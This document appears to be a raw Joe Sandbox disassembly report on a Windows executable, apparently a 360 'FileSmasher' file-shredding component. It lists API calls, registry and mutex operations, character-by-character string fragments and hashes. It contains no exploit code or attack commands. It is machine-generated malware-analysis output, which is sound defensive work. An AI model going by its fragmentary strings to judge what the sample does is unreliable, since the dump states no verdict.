WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448B42
WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448B5C
WriteFile.KERNEL32(?,?,00010000,004478D7,00000000,?,?,?,00000000,00000001), ref: 00448B82
WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448BB1
WaitForSingleObject.KERNEL32(?,00000000,?,?,?,00000000,00000001), ref: 00448BCB
WriteFile.KERNEL32(?,?,?,004478D7,00000000,?,?,?,00000000,00000001), ref: 00448BF1
CloseHandle.KERNEL32(?,?,?,?,00000000,00000001), ref: 00448C0C
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,80000080,00000000,?,?,?,00000000,00000001), ref: 00448C28
CloseHandle.KERNEL32(00000000), ref: 00449641

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$ObjectSingleWait$CloseCreateHandleWrite$Size_memset
String ID:
API String ID: 1172678342-0
Opcode ID: 8158509e58f484527f8a71e58faa1b2d8b70b3c493390f632461b5bab676af5f
Instruction ID: 64ce1d2b17513850fb0e4411e5c373f0339fe494243065142823b194911eea1b
Opcode Fuzzy Hash: 8158509e58f484527f8a71e58faa1b2d8b70b3c493390f632461b5bab676af5f
Instruction Fuzzy Hash: 2F729F71A00302ABFF209F658C85F6F77A8AB44B14F24462AB911EB2D0DB79DD41D76C

Function 004075EC Relevance: 83.1, Strings: 66, Instructions: 608COMMON

Download Yara Rule

Strings

e, xrefs: 00407852
a, xrefs: 00407942
c, xrefs: 004078A0
e, xrefs: 004076F9
r, xrefs: 004078D1
s, xrefs: 00407794
e, xrefs: 0040780C
o, xrefs: 00407771
o, xrefs: 00407707
e, xrefs: 004078B5
n, xrefs: 004076E4
R, xrefs: 00407786
t, xrefs: 00407934
O, xrefs: 00407813
R, xrefs: 004076F2
z, xrefs: 00407805
o, xrefs: 00407899
e, xrefs: 004077B7
u, xrefs: 0040783D
R, xrefs: 004078AE
c, xrefs: 004077B0
R, xrefs: 00407821
i, xrefs: 004077FE
r, xrefs: 0040792D
r, xrefs: 00407715
d, xrefs: 004076EB
k, xrefs: 004078A7
L, xrefs: 0040776A
d, xrefs: 0040777F
s, xrefs: 0040782F
c, xrefs: 0040771C
r, xrefs: 004077A9
2MNE, xrefs: 00408264
t, xrefs: 0040797A
u, xrefs: 004078CA
P, xrefs: 00407950
S, xrefs: 004077F7
l, xrefs: 00407949
r, xrefs: 00407957
e, xrefs: 00407723
c, xrefs: 004078D8
W, xrefs: 0040772A
a, xrefs: 00407778
o, xrefs: 0040795E
e, xrefs: 004078DF
i, xrefs: 00407926
c, xrefs: 0040784B
s, xrefs: 00407700
o, xrefs: 0040779B
u, xrefs: 0040793B
V, xrefs: 0040791F
r, xrefs: 00407844
i, xrefs: 004076DD
L, xrefs: 00407892
F, xrefs: 004076D6
f, xrefs: 0040781A
s, xrefs: 004078BC
e, xrefs: 00407828
o, xrefs: 00407836
c, xrefs: 00407973
u, xrefs: 0040770E
o, xrefs: 004078C3
e, xrefs: 0040778D
e, xrefs: 0040796C
t, xrefs: 00407965
u, xrefs: 004077A2

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 2MNE$F$L$L$O$P$R$R$R$R$S$V$W$a$a$c$c$c$c$c$c$d$d$e$e$e$e$e$e$e$e$e$e$f$i$i$i$k$l$n$o$o$o$o$o$o$o$r$r$r$r$r$r$s$s$s$s$t$t$t$u$u$u$u$u$z
API String ID: 0-216447694
Opcode ID: 69ce321923e5cd9e518d835ccab4f2693d4ca7b4ba0374b9dafebf2ed5070242
Instruction ID: a7f5f5e23313dbf3c6bde7b8e4d078ffeeeac1d81af07d715f0eadca70b2c66c
Opcode Fuzzy Hash: 69ce321923e5cd9e518d835ccab4f2693d4ca7b4ba0374b9dafebf2ed5070242
Instruction Fuzzy Hash: A242E461D1C6E889FB218628DC047DABA75DF61304F0840F9D58DAB2C1D6BF0FD58B66

Function 0040F18F Relevance: 80.7, Strings: 64, Instructions: 681COMMON

Download Yara Rule

Strings

l, xrefs: 004121D1
l, xrefs: 00412152
E, xrefs: 0041223A
f, xrefs: 0041213D
r, xrefs: 0042029C
y, xrefs: 00412128
t, xrefs: 004121CA
T, xrefs: 0041225D
e, xrefs: 004202B1
t, xrefs: 00412279
u, xrefs: 00412113
5C?G, xrefs: 0040F331
s, xrefs: 004202B8
a, xrefs: 00412175
o, xrefs: 00412167
n, xrefs: 00412241
I, xrefs: 004121D8
s, xrefs: 004202BF
a, xrefs: 00412272
R, xrefs: 004121C3
e, xrefs: 0041211A
u, xrefs: 0041214B
e, xrefs: 004121F4
y, xrefs: 00412256
L, xrefs: 00412160
o, xrefs: 00412225
a, xrefs: 00412144
D, xrefs: 004121FB
a, xrefs: 00412280
o, xrefs: 004202A3
P, xrefs: 00420295
t, xrefs: 00412105
D, xrefs: 0041212F
e, xrefs: 00412183
e, xrefs: 00412210
c, xrefs: 00412217
9:=9, xrefs: 0040F47C
m, xrefs: 004121DF
c, xrefs: 004202AA
P, xrefs: 00420638
c, xrefs: 0041216E
y, xrefs: 00412233
Q, xrefs: 0041210C
t, xrefs: 0042028E
l, xrefs: 0041217C
r, xrefs: 0041224F
i, xrefs: 00420287
r, xrefs: 00412209
, xrefs: 0042168D
o, xrefs: 00412264
g, xrefs: 004121ED
D, xrefs: 0041226B
i, xrefs: 00412202
r, xrefs: 00412121
e, xrefs: 00412136
a, xrefs: 004121E6
CrashReport.dll, xrefs: 004202EF, 00420332
x, xrefs: 00420280
t, xrefs: 00412159
N, xrefs: 004120FE
E, xrefs: 00420279
t, xrefs: 0041221E
r, xrefs: 0041222C
t, xrefs: 00412248

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $5C?G$9:=9$CrashReport.dll$D$D$D$E$E$I$L$N$P$P$Q$R$T$a$a$a$a$a$c$c$c$e$e$e$e$e$e$f$g$i$i$l$l$l$m$n$o$o$o$o$r$r$r$r$r$s$s$t$t$t$t$t$t$t$u$u$x$y$y$y
API String ID: 0-1235053328
Opcode ID: 562ee16913f985045558104e983d31beba8082fa8bdc3491150a384b87bfdebb
Instruction ID: 7799175ddb04afdd2e5c59b2a8b778c513ab43489afc74fc578c2c2c00726141
Opcode Fuzzy Hash: 562ee16913f985045558104e983d31beba8082fa8bdc3491150a384b87bfdebb
Instruction Fuzzy Hash: 8452F671D082A88AFB24CA24DC447EABAB1EF51304F1440FAD44C67682D7BE4FC5CB66

Function 0043E2B0 Relevance: 75.6, APIs: 26, Strings: 17, Instructions: 311synchronizationwindowCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003), ref: 0043E2BC
ImmDisableIME.IMM32(00000000), ref: 0043E2C4
GetCommandLineW.KERNEL32(00000000), ref: 0043E2C9

Part of subcall function 0043E180: _memset.LIBCMT ref: 0043E1B6
Part of subcall function 0043E180: _memset.LIBCMT ref: 0043E1C9
Part of subcall function 0043E180: _memset.LIBCMT ref: 0043E232
Part of subcall function 0043E180: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0043E247
Part of subcall function 0043E180: WTSQuerySessionInformationW.WTSAPI32(00000000,000000FF,00000004,?,?), ref: 0043E270

CreateMutexW.KERNEL32(00000000,00000001,Local\Q360FileSmasher), ref: 0043E2F1
GetLastError.KERNEL32 ref: 0043E2FD
CloseHandle.KERNEL32(00000000), ref: 0043E30B
StrStrIW.SHLWAPI(00000000,/shredfilelist="), ref: 0043E341
StrStrIW.SHLWAPI(00000000,/settings), ref: 0043E35E
FindWindowW.USER32(Q360FileSmasher,00000000), ref: 0043E385
PostMessageW.USER32(00000000,0000062A,00000000,00000000), ref: 0043E395

Strings

/settings, xrefs: 0043E358
T9N, xrefs: 0043E4C5
\elevated, xrefs: 0043E4A8
Q360FileSmasher, xrefs: 0043E380, 0043E3A5
"%s\%s", xrefs: 0043E50E
OnExiting, xrefs: 0043E641
j, xrefs: 0043E5BB
FileSmasher, xrefs: 0043E5AD
T9N, xrefs: 0043E326
CrashReport.dll, xrefs: 0043E419, 0043E632
/shredfilelist=", xrefs: 0043E335, 0043E4D0
%s%s" \elevated, xrefs: 0043E4D5
k, xrefs: 0043E5C9
Local\Q360FileSmasher, xrefs: 0043E2E8
QHFileSmasher.exe, xrefs: 0043E508
Initialize, xrefs: 0043E45F
T9N, xrefs: 0043E4F1

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset$Error$CloseCommandCreateDisableFileFindHandleInformationLastLineMessageModeModuleMutexNamePostQuerySessionWindow
String ID: "%s\%s"$%s%s" \elevated$/settings$/shredfilelist="$CrashReport.dll$FileSmasher$Initialize$Local\Q360FileSmasher$OnExiting$Q360FileSmasher$QHFileSmasher.exe$T9N$T9N$T9N$\elevated$j$k
API String ID: 1902784322-2381632180
Opcode ID: 59198087e51c1363d126bae50eb2ade3f94f94c331f8b47c28bae9ad9aa6ace2
Instruction ID: 70a8ff0a3b9e5c91b017811f117eb0c60edb2bcc08bfe4f646206ccabeb3a458
Opcode Fuzzy Hash: 59198087e51c1363d126bae50eb2ade3f94f94c331f8b47c28bae9ad9aa6ace2
Instruction Fuzzy Hash: 47B1F375A002059BD700EBB6DC46FAE77A8EF48315F04426EF901E72E2DB789905CB6D

Function 004A0059 Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 004A0090
___getlocaleinfo.LIBCMT ref: 004A00A5
___getlocaleinfo.LIBCMT ref: 004A00BA
___getlocaleinfo.LIBCMT ref: 004A00CF
___getlocaleinfo.LIBCMT ref: 004A00E7
___getlocaleinfo.LIBCMT ref: 004A00FC
___getlocaleinfo.LIBCMT ref: 004A010E
___getlocaleinfo.LIBCMT ref: 004A0123
___getlocaleinfo.LIBCMT ref: 004A013B
___getlocaleinfo.LIBCMT ref: 004A0150

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: 7149db81927407c76787afe78904fe86b4b779e5014d3df2113b982d8224dec7
Instruction ID: d78bb72a78f728332970ea5f5fe48e6d28cccd5370fe34feca858d2a329bf209
Opcode Fuzzy Hash: 7149db81927407c76787afe78904fe86b4b779e5014d3df2113b982d8224dec7
Instruction Fuzzy Hash: A4E1BCB290020DFEEF12DAE1CC85DFF7BFDEB44748F05092EB25592041EA75AA059B64

Function 00446220 Relevance: 46.0, APIs: 22, Strings: 4, Instructions: 518registrystringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32 ref: 004462B6
lstrcmpiW.KERNEL32(?,ForceRemove), ref: 004462C5
CharNextW.USER32(?), ref: 00446315
lstrcmpiW.KERNEL32(?,?), ref: 00446336
lstrlenW.KERNEL32(?), ref: 004463BE
lstrcmpiW.KERNEL32(?,NoRemove), ref: 0044641C
lstrcmpiW.KERNEL32(?,Val), ref: 0044644F
RegDeleteValueW.ADVAPI32(?,?,?), ref: 0044652E
RegCloseKey.ADVAPI32(?), ref: 00446546
CharNextW.USER32(?), ref: 00446588
RegOpenKeyExW.ADVAPI32(?,?,00000000,0002001F,?), ref: 004465C6
RegCloseKey.ADVAPI32(?), ref: 004465DD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0044661D
RegCloseKey.ADVAPI32(?), ref: 0044662C
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00446675
RegCloseKey.ADVAPI32(?), ref: 0044668A
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 00446718
RegCloseKey.ADVAPI32(?), ref: 0044672F
lstrlenW.KERNEL32(?,C1DE166F), ref: 0044679A
RegCloseKey.ADVAPI32(?,C1DE166F), ref: 00446886
RegDeleteKeyW.ADVAPI32(?,?), ref: 004468D0
RegCloseKey.ADVAPI32(?), ref: 00446997

Strings

Val, xrefs: 00446449
ForceRemove, xrefs: 004462BC
Delete, xrefs: 004462A6
NoRemove, xrefs: 00446416

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Close$lstrcmpi$Open$CharDeleteNextlstrlen$CreateValue
String ID: Delete$ForceRemove$NoRemove$Val
API String ID: 2903862752-1781481701
Opcode ID: 537ced69c2cd842a418a76494a0b16460cd5d7ff513b27c580eaa63c3c2ddb9f
Instruction ID: 38dacbaf035d53700198e9207873e49377624f0e13f7760dddca0bad48bb2fbe
Opcode Fuzzy Hash: 537ced69c2cd842a418a76494a0b16460cd5d7ff513b27c580eaa63c3c2ddb9f
Instruction Fuzzy Hash: 6B12B971D01239ABEF35AF55DC886AEB2B4AF45744F0101AFE405A7340D7788E85CF9A

Function 00412670 Relevance: 32.9, Strings: 26, Instructions: 365COMMON

Download Yara Rule

Strings

b, xrefs: 0041275F
r, xrefs: 0042029C
c, xrefs: 004202AA
r, xrefs: 00412774
L, xrefs: 00412735
a, xrefs: 0041276D
P, xrefs: 00420638
e, xrefs: 004202B1
y, xrefs: 0041277B
t, xrefs: 0042028E
a, xrefs: 00412743
i, xrefs: 00420287
W, xrefs: 00412782
, xrefs: 0042168D
s, xrefs: 004202B8
s, xrefs: 004202BF
r, xrefs: 00412766
d, xrefs: 0041274A
o, xrefs: 0041273C
CrashReport.dll, xrefs: 004202EF, 00420332
i, xrefs: 00412758
x, xrefs: 00420280
E, xrefs: 00420279
o, xrefs: 004202A3
P, xrefs: 00420295
L, xrefs: 00412751

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: $CrashReport.dll$E$L$L$P$P$W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
API String ID: 0-1806678545
Opcode ID: 0a6a548e8bdc20afd2ce68292e80a03c9196dcf4a7353b167b4aef734bcb2bdb
Instruction ID: 2d2fd1696cb9a11b1d54eaca7a4e0fd4c7847b6d7041376ab4959040b79c7eec
Opcode Fuzzy Hash: 0a6a548e8bdc20afd2ce68292e80a03c9196dcf4a7353b167b4aef734bcb2bdb
Instruction Fuzzy Hash: 03E1C4B1E052A89EF720CA24DC447EABAB5EF51314F0480FAD44CA7681D67E0FD58F66

Function 0041C004 Relevance: 20.3, Strings: 16, Instructions: 313COMMON

Download Yara Rule

Strings

l, xrefs: 0041C45B
7, xrefs: 0041C064
J28;, xrefs: 0041C40E
V, xrefs: 0041C423
l, xrefs: 0041C462
A, xrefs: 0041C454
c, xrefs: 0041C470
r, xrefs: 0041C431
l, xrefs: 0041C44D
7, xrefs: 0041C072
t, xrefs: 0041C438
o, xrefs: 0041C469
a, xrefs: 0041C446
_R, xrefs: 0041C801
i, xrefs: 0041C42A
u, xrefs: 0041C43F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 7$7$A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
API String ID: 0-1200273302
Opcode ID: 28ba7fbba3feb0cead49acf312b846af2c6be0a3097d648dea64c9067175bc85
Instruction ID: b47088309b577f7c50cf058c335edba89fd58862b3e482b340e0a04e71949f29
Opcode Fuzzy Hash: 28ba7fbba3feb0cead49acf312b846af2c6be0a3097d648dea64c9067175bc85
Instruction Fuzzy Hash: 0DC12571D082A48EF7208624DC84BEA7BB5EF91314F0441FAD48D9B282D77D5FC28B66

Function 0041C026 Relevance: 20.3, Strings: 16, Instructions: 302COMMON

Download Yara Rule

Strings

l, xrefs: 0041C45B
7, xrefs: 0041C064
J28;, xrefs: 0041C40E
V, xrefs: 0041C423
l, xrefs: 0041C462
A, xrefs: 0041C454
c, xrefs: 0041C470
r, xrefs: 0041C431
l, xrefs: 0041C44D
7, xrefs: 0041C072
t, xrefs: 0041C438
o, xrefs: 0041C469
a, xrefs: 0041C446
_R, xrefs: 0041C801
i, xrefs: 0041C42A
u, xrefs: 0041C43F

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 7$7$A$J28;$V$_R$a$c$i$l$l$l$o$r$t$u
API String ID: 0-1200273302
Opcode ID: 1478cf694196ca9b350df43d916b710f63da0de0c4049037703d7dd154c96519
Instruction ID: 6a6821eb800bc17307eb9a5ec330426600e786462c0f6a262b46102692df8cb9
Opcode Fuzzy Hash: 1478cf694196ca9b350df43d916b710f63da0de0c4049037703d7dd154c96519
Instruction Fuzzy Hash: 5CC1D471D082A88EF7208724DC84BEA7BB5EF91314F1441FAD48D97282D7795FC28B66

Function 004107D7 Relevance: 19.1, Strings: 15, Instructions: 305COMMON

Download Yara Rule

Strings

a, xrefs: 00411014
d, xrefs: 0041101B
o, xrefs: 0041100D
a, xrefs: 0041103E
i, xrefs: 00411029
L, xrefs: 00411022
r, xrefs: 00411037
NFAF, xrefs: 00410A60
CrashReport.dll, xrefs: 00410FD5
y, xrefs: 0041104C
W, xrefs: 00411053
L, xrefs: 00411006
b, xrefs: 00411030
r, xrefs: 00411045
CGB>, xrefs: 004110AB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: CGB>$CrashReport.dll$L$L$NFAF$W$a$a$b$d$i$o$r$r$y
API String ID: 0-2975757544
Opcode ID: eac9a8c89c20c730b821d41ff1d73c862a32a5d1deaca93cfb33df2c4e0a530f
Instruction ID: c3fc6b31299b4ff0d883bf28e2f011910b9e91c0d681c6d53ca398b40e37eec5
Opcode Fuzzy Hash: eac9a8c89c20c730b821d41ff1d73c862a32a5d1deaca93cfb33df2c4e0a530f
Instruction Fuzzy Hash: A2D1DDB0D091688BEB24CB14CC90BEAB7B6AF85304F1481EAD50DA7742D2795FD2CF46

Function 004109E9 Relevance: 19.0, Strings: 15, Instructions: 240COMMON

Download Yara Rule

Strings

a, xrefs: 00411014
d, xrefs: 0041101B
o, xrefs: 0041100D
a, xrefs: 0041103E
i, xrefs: 00411029
L, xrefs: 00411022
r, xrefs: 00411037
NFAF, xrefs: 00410A60
CrashReport.dll, xrefs: 00410FD5
y, xrefs: 0041104C
W, xrefs: 00411053
L, xrefs: 00411006
b, xrefs: 00411030
r, xrefs: 00411045
CGB>, xrefs: 004110AB

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: CGB>$CrashReport.dll$L$L$NFAF$W$a$a$b$d$i$o$r$r$y
API String ID: 0-2975757544
Opcode ID: d10fddae31009e03eeeb6f156b61e872a3f9cdd0c8a31fb12ca3dd6dc8f7b315
Instruction ID: 222e1c32f40c1fa7557b5a4b6e74b342b59b81caba43ebd11db7046d890ecc55
Opcode Fuzzy Hash: d10fddae31009e03eeeb6f156b61e872a3f9cdd0c8a31fb12ca3dd6dc8f7b315
Instruction Fuzzy Hash: 62A13670D091988AEB20CB24CC947EABB75EF46304F1480EEC94DA7682D6795FC5CF56

Function 004113BC Relevance: 18.1, Strings: 14, Instructions: 594COMMON

